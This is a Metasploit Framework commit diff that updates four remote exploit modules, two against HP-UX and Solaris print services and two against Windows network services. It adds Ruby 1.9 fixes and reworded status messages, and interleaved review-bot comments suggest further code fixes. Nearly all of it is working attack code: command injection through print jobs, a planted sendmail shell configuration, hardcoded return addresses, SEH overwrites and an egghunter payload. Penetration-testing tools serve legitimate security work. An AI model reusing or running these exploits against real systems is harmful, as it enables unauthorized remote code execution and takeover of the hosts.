1.9 compatibility fixes for lpd exploits, clarification in the print messages that we are *trying* to exploit something, not absolutely doing so

git-svn-id: file:///home/svn/framework3/trunk@8916 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2010-03-25 14:52:35 +00:00
parent 6d606a7587
commit 22cb5a6bea
5 changed files with 94 additions and 90 deletions


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HP-UX LPD Command Execution',
'Description' => %q{
This exploit abuses an unpublished vulnerability in the
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
target. This vulnerability was silently patched with the
buffer overflow flaws addressed in HP Security Bulletin
HPSBUX0208-213.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
@ -53,13 +53,13 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
@ -73,36 +73,37 @@ class Metasploit3 < Msf::Exploit::Remote
# Connect to the LPD service
connect
print_status("Sending our job request with embedded command string...")
# Send the job request with the encoded command
sock.put(
"\x02" + rand_text_alphanumeric(3) + jid +
"`" + payload.encoded + "`\n"
)
res = sock.get_once(1)
if (res[0] != 0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our job request")
return
end
print_status("Sending our fake control file...")
print_status("Sending our fake control file...")
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
res = sock.get_once(1)
if (res[0] != 0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our control file")
return
end
print_status("Forcing an error and hijacking the cleanup routine...")
begin
sock.put(rand_text_alphanumeric(16384))
disconnect
rescue
end
end
end
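Review bot: The new acceptance checks `if !(res and res[0,1] == "\x00")` (twice in this hunk, and again twice in send_file of the Solaris module) use `and` for boolean logic; it only behaves here because the whole expression is parenthesised, and `&&` is the conventional operator for this. The same test reads more directly as `unless res && res[0,1] == "\x00"`. Since `get_once(1)` is asked for a single byte, `res.getbyte(0) == 0` would also sidestep any string-encoding comparison on 1.9, if 1.8.7 is the minimum supported interpreter. The enclosing exploit method begins before this hunk.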


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Solaris LPD Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution flaw in
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
up to and including 8.0. This module uses a technique
discovered by Dino Dai Zovi to exploit the flaw without
needing to know the resolved name of the attacking system.
},
'Author' => [ 'hdm', 'ddz' ],
'License' => MSF_LICENSE,
@ -50,14 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DisclosureDate' => 'Aug 31 2001',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This is the temporary path created in the spool directory
spath = "/var/spool/print"
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
"f"+"dfA"+jid+"config\n"+
"f"+"dfA"+jid+"script\n"
# The mail configuration file
mailcf =
@ -102,10 +102,10 @@ class Metasploit3 < Msf::Exploit::Remote
"\n"+
"Mlocal P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
"Mprog P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
# Establish the first connection to the server
sock1 = connect(false)
# Request a cascaded job
sock1.put("\x02metasploit:framework\n")
res = sock1.get_once
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("The target did not accept our job request command")
return
end
print_status("Configuring the spool directory...")
if !(
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
@ -123,19 +123,19 @@ class Metasploit3 < Msf::Exploit::Remote
sock1.close
return
end
# Establish the second connection to the server
sock2 = connect(false)
# Request another cascaded job
sock2.put("\x02localhost:metasploit\n")
res = sock2.get_once
if (not res)
print_status("The target did not accept our second job request command")
return
end
print_status("Triggering the vulnerable call to the mail program...")
end
print_status("Attempting to trigger the vulnerable call to the mail program...")
if !(
send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
send_file(sock2, 3, "dfa" + jid + "config", mailcf)
@ -143,36 +143,37 @@ class Metasploit3 < Msf::Exploit::Remote
sock1.close
sock2.close
return
end
end
sock1.close
sock2.close
print_status("Waiting up to 60 seconds for the payload to execute...")
sleep(60)
handler
end
def send_file(s, type, name, data='')
s.put(type.chr + data.length.to_s + " " + name + "\n")
res = s.get_once(1)
if !(res and res[0] == ?\0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our control file command (#{name})")
return
end
s.put(data)
s.put("\x00")
res = s.get_once(1)
if !(res and res[0] == ?\0)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our control file data (#{name})")
return
end
end
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
return true
end
end
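Review bot: The LPD size field in send_file is still built from `data.length`, which on 1.9 counts characters rather than bytes, so a non-ASCII control or data file would announce the wrong size; given the 1.9-compat intent of this commit, `s.put(type.chr + data.bytesize.to_s + " " + name + "\n")` (and the same in the "Uploaded" sprintf) would be the consistent fix, with `bytesize` available from 1.8.7. The control and mailcf strings built above are ASCII, so this is latent rather than a live failure. Separately, the guard `if (not res)` after the second job request returns without closing sock1, unlike the neighbouring failure paths that close both sockets; a `sock1.close` before that return would match them. exploit's body starts before the hunks shown.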


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2005-1009'],
['OSVDB', '15234'],
@ -44,8 +44,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
],
'Privileged' => false,
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
connect
hname = "METASPLOIT"
probe =
probe =
"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
print_status("Trying target #{target.name}...")
head =
head =
"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
sent = 0
try = 0
15.times {
15.times {
try += 1
connect
sent = sock.put(pattern)
@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
sleep(4)
print_status("Triggering memory overwrite by reconnecting...")
print_status("Attempting to trigger memory overwrite by reconnecting...")
begin
10.times { |x|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Waiting for payload to execute...")
handler
disconnect
disconnect
end
def wfs_delay
@ -162,3 +162,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
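Review bot: The status message in the reconnect loop still contains a typo, `sleeping fo four seconds`; since this commit is already reworking the print messages, `print_status("Overflow request sent, sleeping for four seconds (#{try} tries)")` would fix it. The remaining hunks in this file are whitespace changes and the trailing-newline addition, which need no change.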


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -21,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow',
'Description' => %q{
This module exploits a registry-based stack overflow in the Windows Routing
and Remote Access Service. Since the service is hosted inside svchost.exe,
a failed exploit attempt can cause other system services to fail as well.
A valid username and password is required to exploit this flaw on Windows 2000.
This module exploits a registry-based stack overflow in the Windows Routing
and Remote Access Service. Since the service is hosted inside svchost.exe,
a failed exploit attempt can cause other system services to fail as well.
A valid username and password is required to exploit this flaw on Windows 2000.
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
Exploiting this flaw involves two distinct steps - creating the registry key
and then triggering an overwrite based on a read of this key. Once the key is
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2006-2370' ],
[ 'OSVDB', '26437' ],
[ 'BID', '18325' ],
[ 'MSB', 'MS06-025' ]
[ 'MSB', 'MS06-025' ]
],
'Privileged' => true,
'DefaultOptions' =>
@ -58,22 +58,22 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
],
'DefaultTarget' => 0))
register_options(
[
[
OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
], self.class)
], self.class)
end
# Post authentication bugs are rarely useful during automation
def autofilter
false
end
def exploit
connect()
smb_login()
@ -82,46 +82,46 @@ class Metasploit3 < Msf::Exploit::Remote
# Generate the egghunter payload
hunter = generate_egghunter()
egg = hunter[1]
# Pick a "filler" character that we know doesn't get mangled
# by the wide string conversion routines
# by the wide string conversion routines
filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
fil = filset[ rand(filset.length) ].chr
# Bind to the actual DCERPC interface
handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle}")
dcerpc_bind(handle)
print_status("Bound to #{handle}")
# Add giant blocks of guard data before and after the egg
eggdata =
# Add giant blocks of guard data before and after the egg
eggdata =
fil * 1024 +
egg +
egg +
payload.encoded +
egg +
egg +
payload.encoded +
fil * 1024
# Place the egghunter where ESI happens to point
bof = (fil * 178)
bof[84, hunter[0].length] = hunter[0]
# Overwrite the SEH ptr, even though ESP is smashed
# The handle after the ret must be an invalid address
pat =
(fil * 886) +
NDR.long(target.ret) +
pat =
(fil * 886) +
NDR.long(target.ret) +
(fil * 3) + "\xc0" +
bof
type2 =
type2 =
NDR.string( (fil * 1024) + "\x00" ) +
NDR.string( pat + "\x00" ) +
NDR.string( (fil * 4096) + "\x00" ) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))
type1 =
NDR.long(rand(0xffffffff))
type1 =
NDR.long(rand(0xffffffff)) + # OperatorDial
NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
NDR.long(rand(0xffffffff)) + # UseLocation
@ -156,24 +156,24 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.long(rand(0xffffffff)) +
NDR.string("\x00" * 514) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))
stubdata =
type1 +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff)) +
NDR.long(rand(0xffffffff))
stubdata =
type1 +
NDR.long(rand(0xffffffff)) +
eggdata
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
begin
print_status('Creating the malicious registry key...')
response = dcerpc.call(0xA, stubdata)
print_status('Triggering the base pointer overwrite...')
print_status('Attempting to trigger the base pointer overwrite...')
response = dcerpc.call(0xA, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
@ -182,3 +182,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
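Review bot: The SMBPIPE option's description is still the placeholder `"Rawr."`, while the module description says the option must be set to 'SRVSVC' for XP SP1; `OptString.new('SMBPIPE', [ true, "The pipe name to use (router, or SRVSVC for XP SP1)", 'router'])` would document that where users see it. Given the 1.9 focus of the commit, `filset` is a literal of high bytes that is indexed, repeated with `fil * 1024` and then concatenated with NDR output; on 1.9 such a literal takes the source file's encoding, so unless the file declares a binary source encoding it may need an explicit binary encoding (guarded by `respond_to?(:force_encoding)` to keep 1.8 working) to avoid encoding errors — worth confirming. exploit continues past the hunk shown.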


@ -927,7 +927,7 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.long(0)
begin
print_status("Triggering the vulnerability...")
print_status("Attempting to trigger the vulnerability...")
dcerpc.call(0x1f, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse